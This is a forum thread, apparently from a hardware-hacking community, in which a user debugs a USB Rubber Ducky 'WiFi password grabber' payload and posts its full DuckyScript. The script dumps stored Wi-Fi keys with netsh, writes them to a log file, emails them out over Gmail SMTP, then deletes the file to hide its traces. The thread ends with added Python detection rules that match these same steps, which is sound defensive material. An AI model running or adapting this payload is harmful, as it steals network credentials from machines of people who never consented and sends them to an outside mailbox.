Posted

I'm new to the ducky and was just trying a sample script. This one - https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---WiFi-password-grabber

For the most part the script works well, except the last part of the script isn't executing. It exits powershell, but never deletes the Log.txt file and never exits the command prompt. In fact it looks like it never attempts to do it. This is on Windows 10. Anyone else experience this? I tried searching the forum, but didn't see a similar post. Thanks!

 


REM --> Delete Log.txt and exit
STRING del Log.txt & exit
ENTER

I also tried 

 


REM --> Delete Log.txt and exit
STRING del Log.txt
ENTER
STRING exit
ENTER

Posted

Hey futsec,

When you plug in the duck to a computer it needs to install drivers for the HID, which is the Duck.

 

So, you should try adding the DELAY command at the top of your script, and elsewhere, like so:

DELAY 3000
REM --> Delete Log.txt and exit
DELAY 150
STRING del Log.txt
ENTER
DELAY 150
STRING exit
ENTER

You need to use the delay command in between some commands so the computer has enough time to process the information before you spam it with keystrokes again.

 

Posted

p1ph - thanks for the response. The text I posted is only the bottom part of the script. I am using the complete script that is in the link in my original post. Here is the complete script with the delay in place. 

 

REM Title: WiFi password grabber
REM Author: Siem
REM Version: 3
REM Description: Saves the SSID, Network type, Authentication and the password to Log.txt and emails the contents of Log.txt from a gmail account.
DELAY 3000

REM --> Minimize all windows
WINDOWS d

REM --> Open cmd
WINDOWS r
DELAY 500
STRING cmd
ENTER
DELAY 1000

REM --> Getting SSID
STRING cd "%USERPROFILE%\Desktop" & for /f "tokens=2 delims=: " %A in ('netsh wlan show interface ^| findstr "SSID" ^| findstr /v "BSSID"') do set A=%A
ENTER

REM --> Creating A.txt
STRING netsh wlan show profiles %A% key=clear | findstr /c:"Network type" /c:"Authentication" /c:"Key Content" | findstr /v "broadcast" | findstr /v "Radio">>A.txt
ENTER

REM --> Get network type
STRING for /f "tokens=3 delims=: " %A in ('findstr "Network type" A.txt') do set B=%A
ENTER

REM --> Get authentication
STRING for /f "tokens=2 delims=: " %A in ('findstr "Authentication" A.txt') do set C=%A
ENTER

REM --> Get password
STRING for /f "tokens=3 delims=: " %A in ('findstr "Key Content" A.txt') do set D=%A
ENTER

REM --> Delete A.txt
STRING del A.txt
ENTER

REM --> Create Log.txt
STRING echo SSID: %A%>>Log.txt & echo Network type: %B%>>Log.txt & echo Authentication: %C%>>Log.txt & echo Password: %D%>>Log.txt
ENTER

REM --> Mail Log.txt
STRING powershell
ENTER
STRING $SMTPServer = 'smtp.gmail.com'
ENTER
STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
ENTER
STRING $SMTPInfo.EnableSsl = $true
ENTER
STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('ACCOUNT@gmail.com', 'PASSWORD')
ENTER
STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
ENTER
STRING $ReportEmail.From = 'ACCOUNT@gmail.com'
ENTER
STRING $ReportEmail.To.Add('RECEIVER@gmail.com')
ENTER
STRING $ReportEmail.Subject = 'WiFi key grabber'
ENTER
STRING $ReportEmail.Body = (Get-Content Log.txt | out-string)
ENTER
STRING $SMTPInfo.Send($ReportEmail)
ENTER
STRING exit
ENTER

REM --> Delete Log.txt and exit
STRING del Log.txt & exit
ENTER
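
From the defender's side, the two most distinctive steps of the payload quoted in this thread, the `netsh wlan show profiles ... key=clear` dump and the `Net.Mail.SmtpClient` send, can be matched in process-creation command lines and PowerShell script-block text. The following Python is an added example, not part of the original posts or the payload author's code; the event tuple layout, rule names, 5-minute correlation window and sample events are assumptions constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Patterns taken from the commands in the payload quoted in this thread.
RULES = {
    "wlan_key_dump": re.compile(
        r'netsh(\.exe)?"?\s+wlan\s+show\s+profiles?\b.*\bkey\s*=\s*clear', re.I),
    "smtp_client": re.compile(r"Net\.Mail\.SmtpClient", re.I),
}
WINDOW = timedelta(minutes=5)  # assumed correlation window

# Constructed sample events (not real logs): (time, host, source, text).
# "process" = process-creation command line, "scriptblock" = PowerShell script block text.
SAMPLE_EVENTS = [
    ("2024-01-01T10:00:00", "WS01", "process", "netsh wlan show interface"),
    ("2024-01-01T10:00:02", "WS01", "process", "netsh  wlan show profiles HomeNet key=clear"),
    ("2024-01-01T10:00:09", "WS01", "scriptblock",
     "$SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)"),
    ("2024-01-01T11:30:00", "WS02", "process", "netsh wlan show profiles"),
    ("2024-01-01T12:00:00", "WS03", "scriptblock",
     "$c = New-Object Net.Mail.SmtpClient('mail.example.test', 25)"),
]

def match_rules(text):
    """Return the sorted names of all rules whose pattern occurs in text."""
    return sorted(name for name, rx in RULES.items() if rx.search(text))

def detect(events):
    """Return alerts as (host, severity, rule) tuples, ordered by event time.

    A key dump alone is 'medium'; an SmtpClient created on the same host
    within WINDOW after a key dump is 'high'. SmtpClient alone is ignored
    because legitimate scripts also send mail."""
    alerts, last_dump = [], {}
    for ts, host, _source, text in sorted(events):
        when = datetime.fromisoformat(ts)
        hits = match_rules(text)
        if "wlan_key_dump" in hits:
            last_dump[host] = when
            alerts.append((host, "medium", "wlan_key_dump"))
        if "smtp_client" in hits and host in last_dump and when - last_dump[host] <= WINDOW:
            alerts.append((host, "high", "wlan_key_dump_then_smtp"))
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The `del`, `echo` and `set` steps are cmd built-ins and do not create processes, so the rules key on `netsh` and on the PowerShell text rather than on the Log.txt cleanup.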
